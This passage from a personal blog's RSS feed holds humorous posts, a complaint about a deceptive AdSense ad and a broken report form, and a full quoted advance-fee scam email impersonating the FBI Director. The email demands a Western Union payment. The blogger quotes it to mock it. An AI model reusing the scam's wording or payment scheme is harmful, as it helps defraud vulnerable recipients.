<a href="http://codex.wordpress.org/FAQ_My_site_was_hacked">WordPress FAQ: My site was hacked</a><br />
<a href="http://ottopress.com/2009/hacked-wordpress-backdoors/">How to find a backdoor in a hacked WordPress</a></p>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Sometimes I Worry About the World I Live In.</title>
		<link>http://smackdown.blogsblogsblogs.com/2012/10/17/sometimes-i-worry-about-the-world-i-live-in/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2012/10/17/sometimes-i-worry-about-the-world-i-live-in/#comments</comments>
		<pubDate>Wed, 17 Oct 2012 18:25:02 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[blogthropology]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=1128</guid>
		<description><![CDATA[&#160; Click on the picture below. Click Like, then Share, then type the words &#8220;Show me&#8221; in the comments. Watch and see what happens.]]></description>
				<content:encoded><![CDATA[<p>&nbsp;</p>
<ol>
<li>Click on the picture below.</li>
<li>Click Like, then Share, then type the words &#8220;Show me&#8221; in the comments.</li>
<li>Watch and see what happens.</li>
</ol>
<p><a href="http://www.facebook.com/photo.php?fbid=10151064471771816&#038;set=a.56424451815.78552.552921815&#038;type=1&#038;relevant_count=1&#038;ref=nf"><img src="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2012/10/fb-jump.png" alt="Click it, you know you want to..." title="Click it, you know you want to..." width="523" height="700" class="aligncenter size-full wp-image-1129" onmouseup="hl2l(event);" style="margin-left:40px;" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2012/10/17/sometimes-i-worry-about-the-world-i-live-in/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The Truth, the Whole Truth, and Nothing But the Truth</title>
		<link>http://smackdown.blogsblogsblogs.com/2012/08/06/the-truth-the-whole-truth-and-nothing-but-the-truth/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2012/08/06/the-truth-the-whole-truth-and-nothing-but-the-truth/#comments</comments>
		<pubDate>Mon, 06 Aug 2012 17:35:47 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[blogthropology]]></category>
		<category><![CDATA[lackofmeds]]></category>
		<category><![CDATA[motivational posters]]></category>
		<category><![CDATA[spin]]></category>
		<category><![CDATA[the prez]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=1117</guid>
		<description><![CDATA[It would be interesting to see what arguments those who opposed the law come up with as well.]]></description>
				<content:encoded><![CDATA[<p><a href="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2012/08/should-take-an-oath21.png"><img src="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2012/08/should-take-an-oath21.png" alt="" title="should-take-an-oath" width="700" height="478" class="aligncenter size-full wp-image-1119" /></a></p>
<p>It would be interesting to see what arguments those who opposed the law come up with as well.</p>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2012/08/06/the-truth-the-whole-truth-and-nothing-but-the-truth/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Best.Nigerian.Scam.EVER! (We gonna send you to jail if you don’t read this email, do you get me?)</title>
		<link>http://smackdown.blogsblogsblogs.com/2012/07/03/best-nigerian-scam-ever-we-gonna-send-you-to-jail-if-you-dont-read-this-email-do-you-get-me/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2012/07/03/best-nigerian-scam-ever-we-gonna-send-you-to-jail-if-you-dont-read-this-email-do-you-get-me/#comments</comments>
		<pubDate>Tue, 03 Jul 2012 18:22:00 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[lackofmeds]]></category>
		<category><![CDATA[nerdiness]]></category>
		<category><![CDATA[scams]]></category>
		<category><![CDATA[WTF]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=1106</guid>
		<description><![CDATA[I have seen some pretty off the wall Nigerian Scam letters in the past, but this one has to be one of the most amazing I have ever received. Reading through this is an anthropological goldmine of insight into just how disconnected the scammers in that country are from how life really works here in [...]]]></description>
				<content:encoded><![CDATA[<p><a href="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2012/07/cops-lights-sm.jpg"><img src="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2012/07/cops-lights-sm.jpg" alt="" title="cops-lights-sm" width="280" height="192" class="alignright size-full wp-image-1107" style="float: right; margin-left:8px;" onmouseup="hl2l(event);" /></a> I have seen some pretty off the wall <a href="http://www.419eater.com/" target="_blank">Nigerian Scam letters</a> in the past, but this one has to be one of the most amazing I have ever received. Reading through this is an anthropological goldmine of insight into just how disconnected the scammers in that country are from how life really works here in the US. The basic premise of the letter is that they are going to arrest me (through email, no less) if I don&#8217;t &#8220;read the attached email and comply&#8221;&#8230; but if I do they will send me $10 million. What a deal, huh? <img src='http://smackdown.blogsblogsblogs.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  Oh, and on top of that these people are apparently under the impression that the Director of the FBI sends out arrest warrants to people via his personal AOL email address.</p>
<p>Here is the email in its entirety for your reading pleasure, as it came to me in an attachment actually named &#8220;warrant of arrest.txt&#8221;:<span id="more-1106"></span></p>
<blockquote class="eml"><p><strong>From</strong>: ROBERT S. MUELLER III, FBI DIRECTOR <huttoking@aol.com><br />
<strong>Reply-to</strong>: <fbioffice100@e-mail.ua><br />
<strong>Subject</strong>: FINAL WARNING: YOU WILL BE ARRESTED AND JAILED IF YOU FAIL TO READ THE ATTACHED E-MAIL AND COMPLY<br />
<strong>Date</strong>: Tue, 3 Jul 2012 08:25:13 -0700</p>
<p>Anti-Terrorist and Monetary Crimes Division<br />
FBI Headquarters In Washington, D.C.<br />
Federal Bureau Of Investigation<br />
J. Edgar Hoover Building<br />
935 Pennsylvania Avenue, NW Washington, D.C. 20535-0001 </p>
<p>Attention: Beneficiary</p>
<p>This is the final warning you are going to receive from me, do you get me? I hope you understand how many times this message has been sent to you.</p>
<p>We have warned you so many times and you have decided to ignore our e-mails or because you believe we have not been instructed to get you arrested and today if you fail to respond back to us with the payment details below, then we would first send a letter to the MAYOR of the city where you reside and direct them to close your bank account until you have been jailed and all your properties will be confiscated by the FBI, CIA and other enforcement agency. We would also send a letter to the company/agency that you are working for so that they could get you fired until we are through with our investigations because a suspect is not supposed to be working for the government or any private organization.</p>
<p>Your ID which we have in our database have been sent to all the crimes agencies in America for them to inset you in their website as an internet fraudsters and to warn people from having any deals with you. This would have been solved all this while if you had gotten the CERTIFICATE ENDORSED AND STAMPED as you were instructed in the e-mail below. This is the federal bureau of investigation (FBI) am writing in response to the e-mail you sent to us and am using this medium to inform you that there is no more time left to waste because you have been given a mandate. As stated earlier to have the document endorsed, signed and stamped without failure and you must adhere to this directives to avoid you blaming yourself at last when we must have arrested and jailed you for life and all your properties will be seized and bank account will be confiscated too.</p>
<p>You failed to comply with our directives/instruction and that was the reason why we didn&#8217;t hear from you, as our director has already been notified about you get the process completed yesterday and right now the WARRANT OF ARREST has been signed against you and it will be carried out in the next 48hours as strictly signed by the FBI director. We have investigated and found out that you didn&#8217;t have any idea when the fraudulent deal was committed with your information&#8217;s/identity and right now your ID is placed on our website as a wanted person, I believe you know that it will be a shame to you and your entire family because after then it will be announce in all the local channels that you are wanted by the FBI.</p>
<p>As a good Christian and a Honest man, I decided to see how i could be of help to you because i would not be happy to see you end up in jail and all your properties confiscated all because your information&#8217;s was used to carry out a fraudulent transactions, i called the EFCC and they directed me to a private attorney who can help you get the process done and he stated that he will endorse and stamp the document at the sum of $98 usd only and i believe this process is cheaper for you.</p>
<p>You need to do every possible thing today and tomorrow to get this process done because our director has called to inform me that the warrant of arrest has been signed against you and once it has been approved, then the arrest will be carried out, and from our investigations we learnt that you were the person that forwarded your identity to one impostor/fraudsters in Nigeria when he had a deal with you about the transfer of some illegal funds into your bank account which is valued at the sum of $10,500,000.00 only.</p>
<p>I pleaded on your behalf so that this agency could give you till 06/06/2012 so that you could get this process done because i learnt that several e-mails has been sent to you without getting a response from you. Bear it in mind that this is the only way that i can be able to help you at this moment or you would have to face the law and its consequences once it had befallen on you. You would make the payment through western union money transfer with the below details.</p>
<p>NAME: DURU VINCE<br />
ADDRESS: LAGOS, NIGERIA<br />
TEXT QUESTION: BETTER<br />
ANSWER: BEST<br />
AMOUNT: $98<br />
Senders Full Name:<br />
Sender Full Address:<br />
Direct Phone Number:<br />
MTCN: </p>
<p>Send the payment details to me as stated above and make sure that you didn&#8217;t hesitate making the payment down to the agency by today so that they could have the certificate endorsed, signed and stamped immediately without any further delay. After all this process has been carried out, then we would have to proceed to the bank for the transfer of your compensation funds which is valued at the sum of $10.500,000.00 usd which was supposed to have been transferred to you all this while.</p>
<p>Note: All the crimes agencies have been contacted on this regards and we shall trace and arrest you if you disregard this instructions. You are given a grace today to make the payment for the document after which your failure to do that will attract a maximum arrest and finally you will be appearing in court for act of terrorism, money laundering and drug trafficking charges, so be warned not to try anything funny because you are been watched.</p>
<p>Expecting your anticipated- Co-operation.</p>
<p>Yours in service,</p>
<p>Robert S. Mueller<br />
FBI DIRECTOR</p></blockquote>
<p>I really wish I had the time to engage these guys in a fuller discussion about my options to stay out of jail, but since I don&#8217;t if anyone else wants to take a stab at it, feel free. <img src='http://smackdown.blogsblogsblogs.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<div><em><a href="http://www.flickr.com/photos/webhostingreview/3090392251/sizes/z/in/photostream/" target="_blank">Police lights</a> image attribution goes to <a href="http://www.flickr.com/photos/webhostingreview/">davidsonscott15</a>.</em></div>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2012/07/03/best-nigerian-scam-ever-we-gonna-send-you-to-jail-if-you-dont-read-this-email-do-you-get-me/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Florida Just Outlawed Chocolate, Y’all</title>
		<link>http://smackdown.blogsblogsblogs.com/2012/04/26/florida-just-outlawed-chocolate-yall/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2012/04/26/florida-just-outlawed-chocolate-yall/#comments</comments>
		<pubDate>Thu, 26 Apr 2012 19:38:49 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[lackofmeds]]></category>
		<category><![CDATA[nerdiness]]></category>
		<category><![CDATA[On The Ball-ness]]></category>
		<category><![CDATA[WTF]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=1082</guid>
		<description><![CDATA[Florida has definitely had its &#8220;doh!&#8221; moments, but this one is a doozy. It seems as if last month, March 23rd 2012, Florida HB 1175 went into effect, with the following intent: &#160; Controlled Substances: Adds to list of Schedule I controlled substances certain specified materials, compounds, mixtures, or preparations that contain hallucinogenic substances or [...]]]></description>
				<content:encoded><![CDATA[<p><a href="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2012/04/big-illegal-chocolate.jpg"><img src="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2012/04/big-illegal-chocolate.jpg" alt="" title="big-illegal-chocolate" width="200" height="200" style="float: right; margin-left:8px;" onmouseup="hl2l(event);" /></a> Florida has definitely had its &#8220;doh!&#8221; moments, but this one is a doozy. It seems as if last month, March 23rd 2012,  <a href="http://www.myfloridahouse.gov/Sections/Bills/billsdetail.aspx?BillId=48415" target="_blank">Florida HB 1175</a> went into effect, with the following intent:</p>
<div style="clear:both;">&nbsp;</div>
<p><span id="more-1082"></span></p>
<blockquote><p>Controlled Substances: Adds to list of Schedule I controlled substances certain specified materials, compounds, mixtures, or preparations that contain hallucinogenic substances or that contain any of these substances&#8217; salts, isomers, &#038; salts of isomers &#8211; <em>Florida HB 1175</em></p></blockquote>
<p>For those who don&#8217;t know, substances in Schedule I are <a href="http://en.wikipedia.org/wiki/Controlled_Substances_Act#Schedule_I_controlled_substances" target="_blank">classified as follows</a>:</p>
<p>&nbsp;(1) Schedule I.<br />
&nbsp;&nbsp;(A) The drug or other substance has a high potential for abuse.<br />
&nbsp;&nbsp;(B) The drug or other substance has no currently accepted medical use in treatment in the United States.<br />
&nbsp;&nbsp;(C) There is a lack of accepted safety for use of the drug or other substance under medical supervision.<br />
&nbsp;&nbsp;&nbsp;No prescriptions may be written for Schedule I substances, and such substances are subject to production quotas by the DEA.</p>
<p>So obviously substances in this category are some serious shit. The bill makes no bones about it either, and clearly states that:</p>
<blockquote><p>The following substances are controlled in Schedule I: unless specifically excepted or unless listed in another schedule, any material, compound, mixture, or preparation that contains any quantity of the following hallucinogenic substances or that contains any of their salts, isomers, and salts of isomers, if the existence of such salts, isomers, and salts of isomers is possible within the specific chemical designation</p></blockquote>
<p>So to be clear, that is <strong>any</strong> material, compound, mixture, or preparation that contains <strong>any quantity</strong> of any of the listed substances is now illegal, with <em>no exceptions</em> (you can&#8217;t even get items containing any of them by prescription). The biggest problem with this is that apparently no one who was involved in either writing or voting on the bill bothered to fact check the list of chemicals (which you can find in the full bill <a href="/images/florida-hb-1175-20120426.pdf" target="_blank">here</a>). Number 66 on this list of substances that will land you in jail for possession of any amount is tyramine, chemical name 4-Hydroxyphenethylamine. A quick search reveals <a href="http://en.wikipedia.org/wiki/Tyramine">exactly what that is</a>:</p>
<blockquote><p>Tyramine (4-hydroxyphenethylamine; para-tyramine, mydrial or uteramin) is a <strong>naturally occurring</strong> monoamine compound and trace amine derived from the amino acid tyrosine. <strong>Tyramine occurs widely in plants and animals</strong>&#8230; Foods containing <em>considerable</em> amounts of tyramine include meats that are potentially spoiled or pickled, aged, smoked, fermented, or marinated (some fish, poultry, and beef); most pork (except cured ham); <strong>chocolate</strong>; alcoholic beverages; and fermented foods, such as most cheeses (except ricotta, cottage cheese, cream cheese and neufchatel cheese), sour cream, yogurt, shrimp paste, soy sauce, soy bean condiments, teriyaki sauce, tofu, tempeh, miso soup, sauerkraut, broad (fava) beans, green bean pods, Italian flat (Romano) beans, snow peas, avocados, bananas, pineapple, eggplants, figs, red plums, raspberries, peanuts, Brazil nuts, coconuts, processed meat, yeast, and an array of cacti. &#8211; <em>a bunch of food that just got outlawed in Florida</em></p></blockquote>
<p>On the bright side, the fact that anyone selling chocolate &#8220;commits a felony of the first degree&#8221; will make dieting that much easier. <img src='http://smackdown.blogsblogsblogs.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  </p>
<p>Yes, we all know chocolate is addictive, but let&#8217;s face it, Halloween is going to suck this year for Florida&#8217;s kids.</p>
<div><em><a href="http://www.flickr.com/photos/sionakaren/3871516012/" target="_blank">Chocolate</a> image attribution goes to <a href="http://www.flickr.com/photos/sionakaren/">Siona Karen</a>.</em></div>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2012/04/26/florida-just-outlawed-chocolate-yall/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>I Got My Eye On You</title>
		<link>http://smackdown.blogsblogsblogs.com/2011/11/22/i-got-my-eye-on-you/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2011/11/22/i-got-my-eye-on-you/#comments</comments>
		<pubDate>Tue, 22 Nov 2011 22:15:36 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[blogthropology]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=1068</guid>
		<description><![CDATA[&#160; No, really&#8230; &#160; &#160; I think this may be a sign that I am watching too much The Walking Dead. By the way, this would look great on you or your boyfriend/girlfriend on a t-shirt!]]></description>
				<content:encoded><![CDATA[<p>&nbsp;</p>
<p>No, really&#8230;</p>
<p>&nbsp;</p>
<p><a href="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2011/11/eyeonyou-sm.png"><img src="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2011/11/eyeonyou-sm.png" alt="No, really, I got my eye on you..." title="I Got My Eye On You" width="700" height="435" class="aligncenter size-full wp-image-1070" onmouseup="hl2l(event);" border="0" /></a></p>
<p>&nbsp;</p>
<p>I think this may be a sign that I am watching too much <a href="http://www.amctv.com/shows/the-walking-dead" target="_blank">The Walking Dead</a>.</p>
<p>By the way, this would look great on you or your boyfriend/girlfriend <a href="http://www.zazzle.com/got_my_eye_on_you_tshirt-235915054424930054" target="_blank">on a t-shirt</a>! <img src='http://smackdown.blogsblogsblogs.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2011/11/22/i-got-my-eye-on-you/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Google Says “Fuck It” For The Christmas Season, Removes The Ability To Report AdSense Violations</title>
		<link>http://smackdown.blogsblogsblogs.com/2011/11/22/google-says-fuck-it-for-the-christmas-season-removes-the-ability-to-report-adsense-violations/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2011/11/22/google-says-fuck-it-for-the-christmas-season-removes-the-ability-to-report-adsense-violations/#comments</comments>
		<pubDate>Tue, 22 Nov 2011 20:57:49 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[blogthropology]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[lackofmeds]]></category>
		<category><![CDATA[marketing]]></category>
		<category><![CDATA[scams]]></category>
		<category><![CDATA[search engines]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=1053</guid>
		<description><![CDATA[It has to be tough policing a program like AdSense. It must be exceptionally difficult during the holiday season, when the payoff to running scams grows so much more. It is so tough, in fact, that this year as the holiday shopping season grows near, with Black Friday just a few short days away, that [...]]]></description>
				<content:encoded><![CDATA[<div style="float:right; margin: 4px;"><img src="http://smackdown.blogsblogsblogs.com/images/googlecanthearyou.png" onmouseup="hl2l(event);" alt="Google Cant Hear You!"></div>
<p> It has to be tough policing a program like AdSense. It must be exceptionally difficult during the holiday season, when the payoff to running scams grows so much more. It is so tough, in fact, that this year as the holiday shopping season grows near, with Black Friday just a few short days away, apparently Google has finally decided to say &#8220;fuck it&#8221;, make it easier on themselves, just remove the ability for anyone to report any violations of the program whatsoever, and allow the scammers to have a field day in the meantime.</p>
<p>While Google may want to give the impression to their stockholders and the public that they have both the search engine spam and advertising program cheaters fully under control, the truth is that they rely quite a bit on reports from the community and consumers for both spam and AdSense violations. For any spam that they find, Google asks <span id="more-1053"></span>people to submit a <a href="https://www.google.com/webmasters/tools/spamreport?hl=en" target="_blank">Google spam report</a>. At this point they require that someone log in before actually filing the report itself. This makes sense, since it helps prevent people erroneously filing large numbers of spam reports against their competitors. For the AdSense violations they supply a separate form that does not require a log in, titled simply <a href="http://www.google.com/adsense/support/bin/topic.py?hl=en&#038;topic=1190500&#038;ctx=as2&#038;rd=1" target="_blank">Reporting a Violation &#8211; AdSense Help</a>. Usually I don&#8217;t run into offending sites with AdSense on them that fill me with enough of a sense of civic duty where I feel compelled to actually fill out a report, but I happened to land on one such today that actually tricked me into clicking on an ad in such a way that it really did annoy me. The page I landed on was <a href="http://www.bigsiteofamazingfacts.com/how-much-does-the-earth-weigh" target="_blank" rel="nofollow">BigSiteofAmazingFacts How Much Does The Earth Weigh</a> (yes, I was distracted by trivial shit again, don&#8217;t judge me), and in the right sidebar there was what appeared to be an embedded Youtube Video from Family Guy:</p>
<p>&nbsp;</p>
<p><img src="http://smackdown.blogsblogsblogs.com/images/howmuchdoestheearthweigh.png" onmouseup="hl2l(event);" alt="I see a video"></p>
<p>&nbsp;</p>
<p>Still distracted (of course) I clicked Play on the video, only instead of playing it suddenly brought me to a site trying to sell me bras. So, thinking I must have <em>missed</em> the rather large video in the sidebar when I tried to click on it, I hit the back button&#8230; and noticed that suddenly the video was gone altogether, and where before I had seen 2 AdSense blocks and a video, now there were 3 AdSense blocks instead:</p>
<p>&nbsp;</p>
<p><img src="http://smackdown.blogsblogsblogs.com/images/howmuchdoestheearthweigh2.png" onmouseup="hl2l(event);" alt="What video?"></p>
<p>&nbsp;</p>
<p>I hit refresh a few times but the video didn&#8217;t return. At that point I realized that it was actually a scam, so I cleared my cookies for that domain, hit refresh again, and voil&#224;, the &#8220;video&#8221; reappeared once again. At this point I was sufficiently irked that I actually decided I was going to report this asshole. It&#8217;s bad enough that a site with crap content like this is ranking #1 (the weight of the Earth is increasing each year from salt from the ocean spray? Seriously, wtf?), while people with content that is just fine are getting penalized supposedly from the Panda fallout. To add in that the guy who owns the site is ripping off advertisers as well just makes it so much worse. So, I headed on over to the AdSense Violation report to be a good citizen&#8230; and I was greeted by this:</p>
<p>&nbsp;</p>
<p><img src="http://smackdown.blogsblogsblogs.com/images/adsense-violation-report-missing.png" onmouseup="hl2l(event);" alt="What AdSense violation report?"></p>
<p>&nbsp;</p>
<p>An essentially blank page, with only a header, navigation, and a box asking me to tell AdSense how they can improve. Go figure.</p>
<p>From a financial perspective it does make sense for Google to make reporting AdSense violators more difficult, especially during the holidays. People who run scams like this actually generate Google money through the AdSense program, a program which currently has <a href="http://musictechpolicy.wordpress.com/2011/09/27/will-google-adsense-submit-the-power-of-google-to-voluntary-oversight/" target="_blank">absolutely no oversight</a>. It is exactly this lack of oversight that means that Google is the only one who knows how much, if any, of the advertising dollars are credited back to the advertisers once these scams are revealed. Hiding the violations report means that far fewer sites will be reported, more scams will be able to run for longer periods of time, and more money will wind up in Google&#8217;s pockets.</p>
<p>Is this profit motive really the reason that the report form is missing? If you ask Google I am sure they would say &#8220;of course not, we&#8217;re Google, you can trust us&#8221;. And since everything with Google is proprietary &#8220;behind closed doors&#8221; trade secrets with them, there is no way to know exactly how many violation reports suddenly went missing that apparently no one has noticed yet. My hunch though is that with something like this, as online shopping hits the holiday rush, the lack of reports that are coming in at the moment is actually too big for them not to have noticed by now, and them not fixing it for this long must be at least in some part intentional on their end.</p>
<p><strong>Update</strong>: As Jen from <a href="http://www.jensense.com/" target="_blank">JenSense.com</a> pointed out in the comments, there is another newer page available where you can actually file the report <a href="http://www.google.com/adsense/support/as/bin/static.py?page=ts.cs&#038;ts=1190500" target="_blank">located here</a>. However, I am not sure that makes it any better, and may in fact make it worse. I wound up on the empty page by actually going to Google and searching for [<a href="http://www.google.com/search?q=report+adsense+violation&#038;num=10" target="_blank">report adsense violation</a>]. The page that Jen provided is in the list, but it is down under the blank page that I found, another unhelpful blank page, and underneath a list of discussions of other people looking for the form. This begs the question&#8230; why did Google leave an otherwise empty page behind with just enough text (ie. header and title) and all of the old link juice there to outrank the &#8220;real&#8221; form? If they redesigned the site, then why not 301 redirect the old form(s) to the new one? It&#8217;s not like they don&#8217;t know how search engines work, ya know?</p>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2011/11/22/google-says-fuck-it-for-the-christmas-season-removes-the-ability-to-report-adsense-violations/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>True Love Means Never Giving Up…</title>
		<link>http://smackdown.blogsblogsblogs.com/2011/10/13/true-love-means-never-giving-up/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2011/10/13/true-love-means-never-giving-up/#comments</comments>
		<pubDate>Fri, 14 Oct 2011 04:44:47 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[blogthropology]]></category>
		<category><![CDATA[lackofmeds]]></category>
		<category><![CDATA[motivational posters]]></category>
		<category><![CDATA[Social Media]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=1044</guid>
		<description><![CDATA[&#160; &#160; &#8220;True Love means never giving up&#8221; &#8211; many a stalker were born from this one innocent sounding phrase.]]></description>
				<content:encoded><![CDATA[<p>&nbsp;<br />
<a href="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2011/10/never-give-up.jpg"><img src="http://smackdown.blogsblogsblogs.com/wp-content/uploads/2011/10/never-give-up.jpg" alt="True Love means never giving up: many a stalker were born from this one innocent sounding phrase." title="never-give-up" width="700" height="467" class="alignnone size-full wp-image-1045" onmouseup="hl2l(event);" /></a></p>
<p>&nbsp;</p>
<p>&#8220;True Love means never giving up&#8221; &#8211; many a stalker were born from this one innocent sounding phrase.</p>
<img src="http://feeds.feedburner.com/~r/mvandemar-smackdown/~4/PZb89fM1am4" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2011/10/13/true-love-means-never-giving-up/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
